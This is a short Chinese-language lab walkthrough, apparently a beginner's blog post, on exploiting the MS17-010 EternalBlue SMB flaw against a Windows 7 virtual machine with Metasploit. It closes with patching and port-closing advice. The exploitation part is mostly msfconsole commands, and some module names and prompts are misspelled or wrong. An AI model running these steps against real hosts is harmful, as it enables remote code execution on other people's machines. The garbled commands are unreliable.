MS17-010 永恒之蓝漏洞利用
漏洞概述:
- 永恒之蓝漏洞是利用框架中一个针对SMB服务(445端口,主要用于连接unix系列系统和windows)进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。
漏洞原理:
- MS17-010漏洞出现在的原因是SrvOs2FeaListSizeToNt在计算需要分配的内存长度时存在问题,以至于可以溢出到邻近的内存块,攻击者向 Windows SMBv1 服务器发送特殊设计的消息,可以远程命令执行。
漏洞搭建:
- 虚拟机安装w7,nmap 扫描一下存在445,然后进行漏洞利用。
漏洞利用:
分两步进行(利用msf框架,在kali里输入msfconsole,进入控制台),首先进行扫描,判断是否存在该漏洞,然后在针对该虚拟机靶机进行攻击。
- 扫描sacnner
首先打开msf,然后search MS17-010
然后进行扫描,判断是否存在该漏洞。
msf > use auxiliary/scanner/smb/smb_ms17_010 //使用该模块
msf > show options //查看可设置选项
msf > auxiliary(smb_ms17_010) > set RHOSTS 192.168.189.0/24 //设置ip或IP段
msf > auxiliary(smb_ms17_010) > run
- 攻击exploit
msf > exploit/window/smb/ms17_010_eterablue //使用该模块
msf > show options //查看可设置选项
msf > auxiliary(smb_ms17_010) > set RHOSTS 192.168.189.139 //设置ip
msf > auxiliary(smb_ms17_010) > run
漏洞修复:
- 为计算机安装最新的安全补丁,微软已发布补丁MS17-010修复了“永恒之蓝”攻击的系统漏洞。
- 关闭445、135、137、138、139端口,关闭网络共享。
ps:萌新一枚,余生很长,请多指教。